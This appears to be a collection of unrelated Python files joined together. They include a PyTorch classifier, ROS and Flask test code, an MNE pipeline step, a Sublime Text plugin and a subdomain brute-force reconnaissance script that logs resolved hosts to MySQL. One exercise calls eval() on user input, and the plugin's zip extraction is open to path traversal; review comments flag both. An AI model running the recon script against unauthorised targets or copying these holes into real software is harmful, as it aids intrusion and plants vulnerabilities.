        self.conv3 = nn.Conv2d(64, 128, 5)
        self._to_linear = None
        # One dummy forward pass through the conv stack determines the
        # flattened feature size feeding fc1.
        self.convs(torch.randn(50, 50).view(-1, 1, 50, 50))
        self.fc1 = nn.Linear(self._to_linear, 512)
        self.fc2 = nn.Linear(512, 36)

    def convs(self, x):
        """Apply the conv/relu/maxpool stack; record the flat size once."""
        for conv in (self.conv1, self.conv2, self.conv3):
            x = F.max_pool2d(F.relu(conv(x)), (2, 2))
        if self._to_linear is None:
            c, h, w = x[0].shape
            self._to_linear = c * h * w
        return x

    def forward(self, x):
        features = self.convs(x).view(-1, self._to_linear)
        hidden = F.relu(self.fc1(features))
        return F.softmax(self.fc2(hidden), dim=1)
net = Net()
optimizer = optim.Adam(net.parameters(),lr = 0.001)
# NOTE(review): MSELoss against softmax outputs + one-hot targets is unusual;
# cross-entropy is the conventional choice — confirm this is intentional.
loss_function = nn.MSELoss()
# Normalise pixel values to [0, 1].
X = torch.Tensor([i[0] for i in training_data]).view(-1,50,50)
X =X/255.0
y = torch.Tensor([i[1] for i in training_data])
VAL_PCT = 0.1  # fraction of the data held out for evaluation
val_size = int(len(X)*VAL_PCT)
print(val_size)
train_X = X[:-val_size]
train_y = y[:-val_size]
test_X = X[-val_size:]
test_y = y[-val_size:]
print(len(train_X))
print(len(test_X))
BATCH_SIZE = 100
EPOCHS = 2
for epoch in range(EPOCHS):
    for i in tqdm(range(0,len(train_X),BATCH_SIZE)):
        batch_X = train_X[i:i+BATCH_SIZE].view(-1,1,50,50)
        batch_y = train_y[i:i+BATCH_SIZE]
        net.zero_grad()
        outputs = net(batch_X)
        loss = loss_function(outputs,batch_y)
        loss.backward()
        optimizer.step()
    print(loss)
correct = 0
total = 0
# Evaluate top-1 accuracy on the held-out split, one sample at a time.
with torch.no_grad():
    for i in tqdm(range(len(test_X))):
        real_class = torch.argmax(test_y[i])
        net_out = net(test_X[i].view(-1,1,50,50))[0]
        predicted_class = torch.argmax(net_out)
        if predicted_class == real_class:
            correct+=1
        total+=1
print(" Accuracy = ",round(correct/total,3))
|
import random
from lab8.logic import *
from lab8.repository import *
from lab8.network import NeuralNetwork
class Controller:
    """Coordinates the data repository with the neural network."""

    def __init__(self, repo):
        self.repo = repo
        self.network = NeuralNetwork(3)

    def train(self, iterations):
        """Train for *iterations* passes over the repository; return final loss."""
        entries = self.repo.fetchEntries()
        for _ in range(iterations):
            self.network.trainInputs(entries)
            print(self.network.loss)
        return self.network.loss

    def test(self):
        """Return (inputs, real, computed, abs error) for every repository entry."""
        entries = self.repo.fetchEntries()
        outcome = []
        for entry in entries:
            real_value = entry[-1]
            computed_value = self.network.feedForward(entry)
            outcome.append((entry[:5], entry[-1], computed_value, abs(real_value - computed_value)))
        return outcome
# Script for scraping website
# import Python module to deal with websites
import urllib2
# import BeautifulSoup to scrape websites
from bs4 import BeautifulSoup
# these next lines read the website into BeautifulSoup
url = "http://www.house.gov/representatives"
page = urllib2.urlopen(url)
soup = BeautifulSoup(page)
page.close()
# a variable (called menu) grabs congressmen listed by last name
menu = soup.find_all("div", {"id":"byName"})
print menu
|
# cards have four fields:
# t : type, one of 'f', 'm', 'p' (free format, multiple choice, pattern matching)
# q : the question they initially present with
# a : the correct answer <-- IF MULTIPLE CHOICE THE CORRECT CHOICE GOES HERE
# m : the other choices (if multiple choice)
# n : any info displayed AFTER the answer is submitted
# cards have this finite state flow: --> present question (q && m). receive and validate user input against (a). display info (n)
# Deck consumed by the flash-card state flow described above.
card_data = [
    {
        't' : 'f',  # free-format answer
        'q' : 'Why is choux handsome?',
        'a' : 'maru',
        'n' : 'did you know: maru is too.'
    },
    {
        't' : 'm',  # multiple choice: 'a' is correct, 'm' holds the decoys
        'q' : 'If ken and linus had a h@cker duel, who would win?',
        'a' : 'linus',
        'm' : ['other option', 'yet another', 'one more'],
        'n' : "You don't want to be a nag, do you?"
    },
    {
        't' : 'p',  # pattern matching: 'a' lists the acceptable matches
        'q' : 'The pattern "xxa" should be matched',
        'a' : ["xxa", "XXA"]
    },
]
|
#!/usr/bin/env python3
import dns.resolver
import mysql.connector
import concurrent.futures
import keys
def a_lookup(record):
    """Return the first A record resolved for *record*, or '0.0.0.0' on any failure."""
    try:
        for ip in dns.resolver.query(record, 'A'):
            return ip
    except Exception:
        # Any resolver error (NXDOMAIN, timeout, ...) maps to the sentinel.
        return "0.0.0.0"
def main(domain, table):
    """Bruteforce subdomains of *domain* from subs.txt and store the ones
    that resolve into the `{table}_services` MySQL table.

    Bug fix: the MySQL connection was never closed; it is now released in
    the finally block.
    """
    with open("subs.txt", "r") as f:
        file = f.read().split()
    subdomains = []
    for line in file:
        subdomains.append(line.strip() + "." + domain)
    records = {}
    # Resolve concurrently; a_lookup returns "0.0.0.0" for failures.
    with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
        future_to_ip = {executor.submit(a_lookup, record): record for record in subdomains}
        for future in concurrent.futures.as_completed(future_to_ip):
            record = future_to_ip[future]
            try:
                records[record] = future.result()
            except Exception as e:
                print("[!] ERROR: %s" % e)
    # Keep only the names that actually resolved.
    actual_records = {k: str(v) for k, v in records.items() if "0.0.0.0" not in str(v)}
    mydb = None
    try:
        mydb = mysql.connector.connect(
            host="localhost",
            user=f"{keys.mysql_username}",
            passwd=f"{keys.mysql_password}",
            database="reconb"
        )
        mycursor = mydb.cursor()
        # Parameterised values; only the table name is interpolated.
        sql = f"INSERT INTO {table}_services (Subdomain, Ip, ModuleName) VALUES (%s, %s, %s)"
        for key, value in actual_records.items():
            mycursor.execute(sql, (key, value, 'Bruteforce'))
        mydb.commit()
    except mysql.connector.errors.Error as e:
        print(f"Mysql Error: {e}")
    finally:
        if mydb is not None:
            mydb.close()  # bug fix: previously leaked the connection
        print(f"bruteforce added to table")
# main("domain.com", "table")
|
from random import randint
import pytest
from bson import ObjectId
from faker import Faker
from pymongo.collection import Collection
from module_11.personal_app.db import get_db
# A syntactically valid ObjectId that matches no stored task.
_FAKE_TASK_ID = str(ObjectId())
fake = Faker()  # random text generator for task fixtures
def _get_test_user_collection() -> Collection:
    """Return the todo collection belonging to the 'test' user."""
    db = get_db()
    user_collection: Collection = db.user
    test_user = user_collection.find_one({'username': 'test'})
    # The user document stores the name of its personal todo collection.
    return getattr(db, test_user['todo_collection'])
def _generate_task(join_number):
    """Return *join_number* random text fragments joined with ';'."""
    return ';'.join(
        fake.text(max_nb_chars=randint(10, 120)) for _ in range(join_number)
    )
def test_index(app, client, auth_test):
    """Anonymous users see the auth links; logged-in users see Log Out."""
    response = client.get('/', follow_redirects=True)
    assert response.status_code == 200
    assert b"Log In" in response.data
    assert b"Register" in response.data
    auth_test.login()
    response = client.get('/')
    assert response.status_code == 200
    response_html = response.data
    assert b'Log Out' in response_html
# Mutating endpoints must redirect anonymous users to the login page.
@pytest.mark.parametrize('path', (
    '/create',
    f'/{_FAKE_TASK_ID}/mark_done',
    f'/{_FAKE_TASK_ID}/delete',
))
def test_login_required(client, path):
    response = client.post(path)
    assert response.headers['Location'] == 'http://localhost/auth/login'
# Unknown task ids (valid ObjectId or garbage) must return 404 when logged in.
@pytest.mark.parametrize('path', (
    f'/{_FAKE_TASK_ID}/delete',
    f'/{_FAKE_TASK_ID}/mark_done',
    '/asdasdf/mark_done',
    '/asdasdf/delete',
))
def test_exists_required(client, auth_test, path):
    auth_test.login()
    assert client.post(path).status_code == 404
# Start from a task in either state; after the POST it must be done.
@pytest.mark.parametrize('done', (
    True,
    False,
))
def test_mark_done(app, client, auth_test, done):
    """POST /<id>/mark_done leaves the task with done == True."""
    path = '/{}/mark_done'
    _id = None
    with app.app_context():
        todo_collection: Collection = _get_test_user_collection()
        todo = todo_collection.find_one({'done': done})
        _id = todo['_id']
        path = path.format(str(_id))
    auth_test.login()
    response = client.post(path, follow_redirects=True)
    assert response.status_code == 200
    with app.app_context():
        todo_collection: Collection = _get_test_user_collection()
        todo = todo_collection.find_one({'_id': ObjectId(_id)})
        assert todo['done']
def test_delete(app, client, auth_test):
    """POST /<id>/delete removes the task from the user's collection."""
    path = '/{}/delete'
    _id = None
    with app.app_context():
        todo_collection: Collection = _get_test_user_collection()
        todo = todo_collection.find_one()
        _id = todo['_id']
        path = path.format(str(_id))
    auth_test.login()
    response = client.post(path, follow_redirects=True)
    assert response.status_code == 200
    with app.app_context():
        todo_collection: Collection = _get_test_user_collection()
        todo = todo_collection.find_one({'_id': ObjectId(_id)})
        assert todo is None
# Each case is a ';'-joined task string generated once at import time.
@pytest.mark.parametrize('task', [
    _generate_task(randint(1, 5))
    for _ in range(10)
])
def test_create(app, client, auth_test, task):
    """Creating a task stores its title (first ';' segment) with the
    highest priority in the collection."""
    path = '/create'
    auth_test.login()
    title, *rest = task.split(';')
    response = client.post(path, data={'task': task}, follow_redirects=True)
    assert response.status_code == 200
    with app.app_context():
        todo_collection: Collection = _get_test_user_collection()
        todo = todo_collection.find_one({'title': title})
        assert todo is not None
        max_priority = list(todo_collection.aggregate(
            [
                {
                    "$group": {
                        "_id": None,
                        "max_priority": {"$max": "$priority"}
                    }
                },
            ]
        ))[0]
        assert todo['priority'] == max_priority['max_priority']
|
# Boundary tests for RiskCalculator.__classify_score (name-mangled private
# method): "ineligible" passes through, score <= 0 -> "economic",
# 1-2 -> "regular", 3 -> "responsible".
def test__classify_score_with_score_eq_ineligible(calculator):
    assert calculator._RiskCalculator__classify_score("ineligible") == "ineligible"
def test__classify_score_with_score_lt_zero(calculator):
    assert calculator._RiskCalculator__classify_score(-1) == "economic"
def test__classify_score_with_score_eq_zero(calculator):
    assert calculator._RiskCalculator__classify_score(0) == "economic"
def test__classify_score_with_score_eq_1(calculator):
    assert calculator._RiskCalculator__classify_score(1) == "regular"
def test__classify_score_with_score_eq_2(calculator):
    assert calculator._RiskCalculator__classify_score(2) == "regular"
def test__classify_score_with_score_eq_3(calculator):
    assert calculator._RiskCalculator__classify_score(3) == "responsible"
|
from numpy import*
# SECURITY NOTE(review): eval() on raw user input executes arbitrary code —
# consider parsing the numbers explicitly instead.
nm = array(eval(input("n de matriculas:")))
# Select the odd enrolment numbers. The original counted them in one pass
# and filled a pre-sized zeros() array in a second pass; a single
# vectorised boolean selection does the same thing.
g2 = array(nm[nm % 2 == 1], dtype=int)
print(g2)
def 소수판별함수(n) :
    """Return True when n is prime, False otherwise.

    Bug fix: n < 2 (0, 1, negatives) was previously reported as prime
    because the trial-division loop never executed. The divisor range is
    also capped at sqrt(n) instead of scanning all the way to n.
    """
    if n < 2:
        return False
    for t in range(2, int(n ** 0.5) + 1):
        if n % t == 0:
            return False
    return True
# Prompt for a number and report whether it is prime.
n = int(input("어떤 수를 판별해줄까요? "))
result = 소수판별함수( n )
if result==True :
    print("소수입니다.")
else :
    print("소수가 아닙니다.")
|
from typing import List
class Solution:
    def diffWaysToCompute(self, input: str) -> List[int]:
        """Return every value obtainable by fully parenthesising the
        arithmetic expression *input* (non-negative integers with +, -, *).

        Improvement: results are memoised per substring; the original
        recomputed identical substrings, giving exponential blow-up.
        """
        memo = getattr(self, '_memo', None)
        if memo is None:
            memo = self._memo = {}
        if input in memo:
            return memo[input]
        res = []
        N = len(input)
        for i in range(N):
            if input[i] in "+-*":
                # Split at the operator and combine every left/right result.
                lefts = self.diffWaysToCompute(input[:i])
                rights = self.diffWaysToCompute(input[i+1:])
                for left in lefts:
                    for right in rights:
                        if input[i] == '+':
                            res.append(left + right)
                        elif input[i] == '-':
                            res.append(left - right)
                        elif input[i] == '*':
                            res.append(left * right)
        if not res:
            # No operator: the substring is a plain number.
            res.append(int(input))
        memo[input] = res
        return res
if __name__ == '__main__':
    # Smoke test: prints the two parenthesisation results of "2-1-1".
    print(Solution().diffWaysToCompute(
        "2-1-1"
    ))
|
# Simple console shopping-cart demo.
List = ['chocolate','biscuit','cola','water','noodles','flour','icecream','sugar']
user = {
    'user_id' : 101,
    'cart' : []
}
while True:
    print('\nMain Menu\n')
    menu = ['list of items','your cart']
    for i in range(len(menu)):
        print(f"{i+1}.{menu[i]}")
    print('0.exit')
    choice = int(input('\nselect an option:'))
    if choice == 0:
        print('Thank you')
        exit()
    elif choice == 1:
        # Show only the items that are not in the cart yet.
        # NOTE(review): set() does not preserve order, so the numbering can
        # change between visits — confirm that is acceptable.
        items = list(set(List) - set(user['cart']))
        for i in range(len(items)):
            print(f'{i+1}.{items[i]}')
        ch = int(input('\nSelect an option:'))
        # Bug fix: the selection must index the *displayed* items list
        # (was List[ch-1]), and the confirmation used items[ch], which
        # was off by one.
        user['cart'].append(items[ch-1])
        print(f'Thanks for adding {items[ch-1]} into your cart')
    elif choice == 2:
        print ('\nYour Cart')
        x = user['cart']
        for i in range(len(x)):
            print(f'{i+1}.{x[i]}')
|
from rest_framework import serializers
from .models import Item, Notification, Sale, SaleItem, Customer, Report, Staff
class ItemSerializer(serializers.HyperlinkedModelSerializer):
    """Serialises stock items; instances are looked up by their unique code."""
    class Meta:
        model = Item
        fields = (
            'id',
            'code',
            'name',
            'price',
            'quantity',
            'warning_quantity',
            'is_chemical',
            'pack_size',
            'for_sale',
        )
        lookup_field = 'code'
class NotificationSerializer(serializers.HyperlinkedModelSerializer):
    """Serialises per-user notifications."""
    class Meta:
        model = Notification
        fields = (
            'id',
            'user_id',
            'text',
            'created_date',
            'notification_type',
            'link',
            'seen',
        )
class SaleItemSerializer(serializers.HyperlinkedModelSerializer):
    """One line of a sale; the related Item is addressed by its code,
    with its string representation exposed as item_name."""
    item = serializers.SlugRelatedField(queryset=Item.objects.all(), slug_field='code')
    item_name = serializers.StringRelatedField(source='item')

    class Meta:
        model = SaleItem
        fields = ('id', 'item', 'sale_price', 'quantity', 'returned_quantity', 'item_name')
class SaleSerializer(serializers.HyperlinkedModelSerializer):
    """Serialises a sale with its nested line items and customer name."""
    saleitem_set = SaleItemSerializer(many=True)
    customer = serializers.StringRelatedField()

    class Meta:
        model = Sale
        fields = ('id', 'datetime', 'customer', 'customer_id', 'saleitem_set')
class CustomerSerializer(serializers.HyperlinkedModelSerializer):
    """Serialises customer account details."""
    class Meta:
        model = Customer
        fields = (
            'user_id',
            'first_name',
            'last_name',
            'charge_code',
            'pays_vat',
            'allowed_chemicals',
        )
class ReportSerializer(serializers.HyperlinkedModelSerializer):
    """Serialises generated report metadata."""
    class Meta:
        model = Report
        fields = ('id', 'filename', 'report_type', 'created_date')
|
#!/usr/bin/env python
# Use joystick input to launch object-tracking nodes in jackal
#
# Intro to Robotics - EE5900 - Spring 2017
# Assignment #6
#
# Project #6 Group #2
# Prithvi
# Aswin
# Akhil (Team Lead)
#
# version: v1.3
# define imports
import rospy
import roslaunch
import sys
import time
import os
from sensor_msgs.msg import Joy
# class to read joystick messages and launch node
class joy_control(object):
    """Reads PS-controller buttons and starts/stops the tracking nodes.

    Bug fixes:
    - Pressing a stop button before the matching start raised NameError
      because the process variable did not exist yet; processes are now
      tracked explicitly and guarded.
    - The wall-following node launched person_following.py again.
    """
    # define self routine
    def __init__(self):
        # define subscriber
        rospy.Subscriber("/bluetooth_teleop/joy", Joy, self.joy_callback)
        rate = rospy.Rate(5)
        rospy.loginfo('started joystick routine..')
        # define and init trigger flags (set by joy_callback)
        self.person_following_start = False
        self.person_following_stop = False
        self.wall_following_start = False
        self.wall_following_stop = False
        # configure node roslaunch api
        package = 'quad_pkg'
        executable_person_following = 'person_following.py'
        node_person_following = roslaunch.core.Node(package, executable_person_following)
        # NOTE(review): this previously launched 'person_following.py' a
        # second time — looks like a copy-paste slip; confirm the script name.
        executable_wall_following = 'wall_following.py'
        node_wall_following = roslaunch.core.Node(package, executable_wall_following)
        launch = roslaunch.scriptapi.ROSLaunch()
        launch.start()
        # Track the launched processes so "stop" is safe before any "start".
        person_following_process = None
        wall_following_process = None
        while not rospy.is_shutdown():
            # if start flag set: launch the node
            if self.person_following_start:
                person_following_process = launch.launch(node_person_following)
            # if stop flag set and a process is running: shut it down
            if self.person_following_stop and person_following_process is not None:
                person_following_process.stop()
                person_following_process = None
            if self.wall_following_start:
                wall_following_process = launch.launch(node_wall_following)
            if self.wall_following_stop and wall_following_process is not None:
                wall_following_process.stop()
                wall_following_process = None
            # reset triggers
            self.person_following_start = False
            self.person_following_stop = False
            self.wall_following_start = False
            self.wall_following_stop = False
            rate.sleep()

    # joystick callback routine
    def joy_callback(self, data):
        # unpack joystick buttons and axes
        x, circ, sq, tri, L1, R1, share, options, p4, L3, R3, DL, DR, DU, DD = data.buttons
        llr, lud, L2, rlr, rud, R2 = data.axes
        # circle: start person following
        if (circ == 1) and (self.person_following_start == False):
            rospy.loginfo("Starting the predator routine...")
            self.person_following_start = True
        # cross: stop person following
        if (x == 1):
            rospy.loginfo("Terminating the predator routine...")
            self.person_following_stop = True
        # square: start wall following
        if (sq == 1) and (self.wall_following_start == False):
            rospy.loginfo("Starting the predator routine 2...")
            self.wall_following_start = True
        # triangle: stop wall following
        if (tri == 1):
            rospy.loginfo("Terminating the predator routine 2...")
            self.wall_following_stop = True
# standard boilerplate
if __name__ == "__main__":
try:
rospy.init_node("joy_start", anonymous=False)
#read in joystick input
run = joy_control()
except rospy.ROSInterruptException:
rospy.loginfo("joy_start node terminated.")
|
"""Setup source space.
Set up source space for forward and inverse computation.
"""
from types import SimpleNamespace
import mne
from ..._config_utils import get_fs_subject, get_fs_subjects_dir, get_subjects
from ..._logging import logger, gen_log_kwargs
from ..._run import failsafe_run, save_logs, _prep_out_files
from ..._parallel import parallel_func, get_parallel_backend
def get_input_fnames_setup_source_space(*, cfg, subject):
    """Return the six FreeSurfer surface files required for the source space."""
    in_files = dict()
    surf_path = cfg.fs_subjects_dir / cfg.fs_subject / "surf"
    for hemi in ("lh", "rh"):
        for kind in ("sphere", "sphere.reg", "white"):
            # Bug fix: the key was the plain string "surf-{hemi}-{kind}"
            # (missing the f-prefix), so all six entries collapsed onto one key.
            in_files[f"surf-{hemi}-{kind}"] = surf_path / f"{hemi}.{kind}"
    return in_files
def get_output_fnames_setup_source_space(*, cfg, subject):
    """Return the path of the source-space FIF file this step writes."""
    bem_dir = cfg.fs_subjects_dir / cfg.fs_subject / "bem"
    return {"src": bem_dir / f"{cfg.fs_subject}-{cfg.spacing}-src.fif"}
@failsafe_run(
    get_input_fnames=get_input_fnames_setup_source_space,
    get_output_fnames=get_output_fnames_setup_source_space,
)
def run_setup_source_space(
    *,
    cfg: SimpleNamespace,
    exec_params: SimpleNamespace,
    subject: str,
    in_files: dict,
) -> dict:
    """Compute the subject's source space and write it under bem/."""
    msg = f"Creating source space with spacing {repr(cfg.spacing)}"
    logger.info(**gen_log_kwargs(message=msg, subject=subject))
    src = mne.setup_source_space(
        cfg.fs_subject,
        spacing=cfg.spacing,
        subjects_dir=cfg.fs_subjects_dir,
        add_dist="patch",
    )
    in_files.clear()  # all used by setup_source_space
    out_files = get_output_fnames_setup_source_space(cfg=cfg, subject=subject)
    mne.write_source_spaces(out_files["src"], src, overwrite=True)
    return _prep_out_files(exec_params=exec_params, out_files=out_files)
def get_config(
    *,
    config: SimpleNamespace,
    subject: str,
) -> SimpleNamespace:
    """Extract the per-subject settings needed by this pipeline step."""
    return SimpleNamespace(
        spacing=config.spacing,
        use_template_mri=config.use_template_mri,
        fs_subject=get_fs_subject(config=config, subject=subject),
        fs_subjects_dir=get_fs_subjects_dir(config),
    )
def main(*, config: SimpleNamespace) -> None:
    """Run forward."""
    # Source estimation can be disabled globally.
    if not config.run_source_estimation:
        msg = "Skipping, run_source_estimation is set to False …"
        logger.info(**gen_log_kwargs(message=msg, emoji="skip"))
        return
    # With a template MRI only that single "subject" is processed.
    if config.use_template_mri is not None:
        subjects = [config.use_template_mri]
    else:
        subjects = get_subjects(config=config)
    # Fan the per-subject runs out over the configured parallel backend.
    with get_parallel_backend(config.exec_params):
        parallel, run_func = parallel_func(
            run_setup_source_space, exec_params=config.exec_params
        )
        logs = parallel(
            run_func(
                cfg=get_config(
                    config=config,
                    subject=subject,
                ),
                exec_params=config.exec_params,
                subject=subject,
            )
            for subject in subjects
        )
    save_logs(config=config, logs=logs)
|
#coding:utf-8
import sublime, sublime_plugin
import json
import webbrowser
import zipfile
import os
import threading
def is_st3():
    """Return True when running on Sublime Text 3 or newer.

    Bug fix: comparing only against '3' sent Sublime Text 4 (version
    strings like '41xx') down the legacy Python 2 / urllib2 code paths.
    """
    return int(sublime.version()[0]) >= 3
if is_st3():
import urllib.request
import io
else:
import urllib2
import cStringIO
class DriveSelector:
    """Quick-panel chooser for Windows drive letters.

    Bug fix: ``string.lowercase`` exists only on Python 2 and raised
    AttributeError on the ST3+ (Python 3) plugin host; use
    ``string.ascii_lowercase``, which works on both.
    """
    def __init__(self, window, callback):
        self.window = window
        self.callback = callback
        self.drive_list = None

    def _get_drives(self):
        """Return drive roots ('a:\\' ...) that can be chdir'd into."""
        import string
        drives = []
        wd = os.getcwd()
        for letter in string.ascii_lowercase:
            drive = u'%s:\\' % letter
            try:
                os.chdir(drive)
                drives.append(drive)
            except:
                # Drive letter not present / not accessible.
                pass
        os.chdir(wd)
        return drives

    def _on_done(self, index):
        # index is -1 when the quick panel is cancelled.
        if index < 0:
            self.callback(None)
        else:
            self.callback(self.drive_list[index])

    def _show_quick_panel(self, options, done):
        if is_st3():
            sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
        else:
            self.window.show_quick_panel(options, done)

    def select(self):
        """Show the panel of available drives; result goes to the callback."""
        self.drive_list = self._get_drives()
        self._show_quick_panel(self.drive_list, self._on_done)
class FolderBrowser:
    """Interactive destination-folder picker built on Sublime's quick panel.

    Repeatedly lists the sub-folders of ``curr_dir`` together with
    navigation entries (up one level / unpack here / create folder /
    change drive); invokes ``callback`` with the chosen directory path,
    or ``None`` on cancel.  Menu labels are Russian (plugin's locale).
    """
    def __init__(self, window, callback, curr_dir=None):
        self.window = window
        self.callback = callback
        self.new_dir_name = 'new_folder'
        if curr_dir is None:
            self.curr_dir = os.path.abspath(os.path.dirname(__file__))
        else:
            self.curr_dir = os.path.abspath(curr_dir)
        # Normalize the path to a unicode string, trying cp1251 first
        # (the plugin targets Russian Windows installs).  On ST3 the
        # two-argument str() raises TypeError for str input, so the
        # except branch effectively keeps the path as-is.
        if is_st3():
            try:
                self.curr_dir = str(self.curr_dir, 'cp1251')
            except:
                self.curr_dir = str(self.curr_dir)
        else:
            try:
                self.curr_dir = unicode(self.curr_dir, 'cp1251')
            except:
                self.curr_dir = unicode(self.curr_dir)
        self.folder_list = []
        self.driver_selector = DriveSelector(self.window, self._check_and_select)
    def _get_file_name(self, file_path):
        # Tail component of a path.
        return os.path.split(file_path)[1]
    def _try_to_set_curr_file_dir(self):
        # Prefer the directory of the currently open file; silently keep
        # the previous curr_dir if there is no open file.
        try:
            view = self.window.active_view()
            cur_file_path = view.file_name()
            cur_file_dir = os.path.dirname(cur_file_path)
            self.curr_dir = cur_file_dir
        except:
            pass
    def _get_sub_dirs(self, dir_path):
        # Names (not full paths) of the immediate sub-directories.
        subdirs = []
        for f in os.listdir(dir_path):
            full_path = os.path.abspath(os.path.join(dir_path, f))
            if os.path.isdir(full_path):
                subdirs.append(f)
        return subdirs
    def _show_quick_panel(self, options, done):
        # ST3 requires deferring the quick panel with set_timeout.
        if is_st3():
            sublime.set_timeout(lambda: self.window.show_quick_panel(options, done), 10)
        else:
            self.window.show_quick_panel(options, done)
    def _check_dir(self, dir_path):
        # True if the directory exists and is listable.
        try:
            os.listdir(dir_path)
        except:
            return False
        else:
            return True
    def _create_dir(self):
        # Prompt for a folder name and create it under curr_dir.
        def on_done(dir_name, *args):
            self.new_dir_name = dir_name
            try:
                dir_path = os.path.normpath(os.path.join(self.curr_dir, dir_name))
                os.mkdir(dir_path)
            except Exception as e:
                sublime.status_message(u'невозможно создать каталог: "%s"' % dir_path)
                self._check_and_select(None)
            else:
                self._check_and_select(dir_path)
        def on_cancel(*args):
            self._check_and_select(None)
        self.window.show_input_panel(u'Введите имя каталога:', self.new_dir_name, on_done, None, on_cancel)
    def _show_folder_menu(self):
        self._show_quick_panel(self.folder_list, self._folder_selected)
    def _sort(self, lst):
        # Case-insensitive sort; py2 uses the deprecated cmp= form.
        if is_st3():
            return sorted(lst, key = str.lower)
        else:
            return sorted(lst, cmp=lambda a,b: cmp(a.lower(), b.lower()))
    def _folder_selected(self, index):
        # Index map (matches the insert order in _select_folder):
        # 0 = up one level, 1 = unpack here, 2 = create folder,
        # 3 = change drive (Windows only); otherwise a sub-folder entry.
        if index < 0:
            self.callback(None)
        elif index == 0:
            dir_ = os.path.normpath(os.path.join(self.curr_dir, '..'))
            self._check_and_select(dir_)
        elif index == 1:
            self.callback(self.curr_dir)
        elif index == 2:
            self._create_dir()
        elif index == 3 and sublime.platform() == 'windows':
            self.drives = self.driver_selector.select()
        else:
            dir_ = os.path.normpath(os.path.join(self.curr_dir, self.folder_list[index]))
            self._check_and_select(dir_)
    def _check_and_select(self, dir_):
        # Enter dir_ if it is readable, then re-show the menu either way.
        if dir_ is not None:
            if self._check_dir(dir_):
                self.curr_dir = dir_
                sublime.status_message(u'текущий каталог: "%s"' % self.curr_dir)
            else:
                sublime.status_message(u'невозможно войти в каталог "%s"; текущий каталог: "%s"' % (dir_, self.curr_dir))
        self._select_folder()
    def _select_folder(self):
        # Rebuild the menu: sorted sub-folders prefixed by the fixed
        # navigation entries (see index map in _folder_selected).
        self.folder_list = list()
        for d in self._get_sub_dirs(self.curr_dir):
            self.folder_list.append(d)
        self.folder_list = self._sort(self.folder_list)
        if sublime.platform() == 'windows':
            self.folder_list.insert(0, u'* сменить диск')
        self.folder_list.insert(0, u'* создать каталог')
        self.folder_list.insert(0, u'* да, распаковать сюда')
        self.folder_list.insert(0, u'* на уровень выше')
        self._show_folder_menu()
    def select_folder(self):
        """Start browsing from the active file's directory if possible."""
        self._try_to_set_curr_file_dir()
        self._select_folder()
class WebfontImportFontCommand(sublime_plugin.TextCommand):
    """Text command that inserts a font @import snippet at the caret."""
    def __init__(self, view):
        super(WebfontImportFontCommand, self).__init__(view)
    def run(self, edit, text):
        """Insert ``text`` at the anchor of the first selection region."""
        print("start WebfontImportFontCommand with args " + text)
        caret = self.view.sel()[0].a
        self.view.insert(edit, caret, text)
class WebfontCommand(sublime_plugin.WindowCommand):
    """Browse the webfonts.ru catalogue: open the site, refresh the list,
    download+unpack a font archive, or insert a font's @import snippet."""
    URL = 'http://webfonts.ru/api/list.json'
    SITE_URL = 'http://webfont.ru/'
    def __init__(self, window):
        super(WebfontCommand, self).__init__(window)
        print("Init webFont")
        self.folder_browser = FolderBrowser(self.window, self._folder_selected)
        # NOTE(review): this network call runs at plugin load and can block
        # up to 5 s -- consider deferring it to the first run().
        self.font_data = self._download_font_info()
        self.archive_url = None
    def _download_font_info(self):
        """Fetch and parse the JSON font catalogue; None on failure."""
        print("_download_font_info")
        try:
            if is_st3():
                fd = urllib.request.urlopen(self.URL, timeout=5).read().decode("utf-8")
                result = json.loads(fd)
            else:
                fd = urllib2.urlopen(self.URL, timeout=5)
                result = json.load(fd)
        except Exception as e:
            print("exception " + str(e))
            if is_st3():
                sublime.error_message(u'не удалось обновить список шрифтов')
            else:
                sublime.status_message(u'не удалось обновить список шрифтов')
            result = None
        return result
    def _download_font_archive(self, url):
        """Download the zip at *url* into an in-memory file; None on failure."""
        try:
            if is_st3():
                zipped_data = urllib.request.urlopen(url, timeout=15).read()
                result = io.BytesIO(zipped_data)
            else:
                zipped_data = urllib2.urlopen(url, timeout=15).read()
                result = cStringIO.StringIO(zipped_data)
        except Exception as e:
            print("exception " + str(e))
            if is_st3():
                sublime.error_message(u'не удалось скачать шрифт')
            else:
                sublime.status_message(u'не удалось скачать шрифт')
            result = None
        return result
    def _unpack_archive(self, fd, dest_folder):
        """Extract every zip member under *dest_folder*; True on success.

        NOTE(review): member names are not sanitized, so a malicious
        archive with '..' components could escape dest_folder (zip-slip).
        """
        try:
            dest_folder = os.path.normpath(dest_folder)
            print("dest folder" + dest_folder)
            z = zipfile.ZipFile(fd)
            for name in z.namelist():
                if name.endswith('/'):
                    # Explicit directory entry.
                    folder_path = os.path.join(dest_folder, name)
                    if not os.path.exists(folder_path):
                        os.makedirs(folder_path)
                else:
                    file_path = os.path.join(dest_folder, name)
                    # FIX: some archives carry no directory entries at all;
                    # create the parent directory before writing, otherwise
                    # open() fails and the whole unpack aborts.
                    file_dir = os.path.dirname(file_path)
                    if file_dir and not os.path.exists(file_dir):
                        os.makedirs(file_dir)
                    print("file_path" + file_path)
                    outfile = open(file_path, 'wb+')
                    outfile.write(z.read(name))
                    outfile.close()
            fd.close()
            return True
        except Exception as e:
            print("exception " + str(e))
            if is_st3():
                sublime.error_message(u'при распаковке шрифта произошла ошибка')
            else:
                sublime.status_message(u'при распаковке шрифта произошла ошибка')
            return False
    def run(self):
        """Show the main menu: 3 fixed actions followed by the font list."""
        print("command start")
        name_list = [u'* перейти на webfont.ru', u'* обновить список шрифтов', u'* скачать шрифт']
        if self.font_data is not None:
            for i in self.font_data:
                name_list.append(i['name'])
        self.window.show_quick_panel(name_list, self._selected)
    def _insert(self, text):
        # ST3 routes through the TextCommand; ST2 edits the view directly.
        if is_st3():
            self.window.active_view().run_command("webfont_import_font", {"text" : text })
        else:
            view = self.window.active_view()
            edit = view.begin_edit()
            pos = view.sel()[0].a
            view.insert(edit, pos, text)
            view.end_edit(edit)
    def _download_font_archive_and_unpack(self, dest_folder, pack_url):
        """Worker-thread body: download the archive and extract it."""
        fd = self._download_font_archive(pack_url)
        if fd is None:
            return
        res = self._unpack_archive(fd, dest_folder)
        if not res:
            return
        sublime.status_message(u'шрифт успешно скачан')
    def _folder_selected(self, dest_folder):
        # Called by FolderBrowser; None means the user cancelled.
        if dest_folder is None:
            return
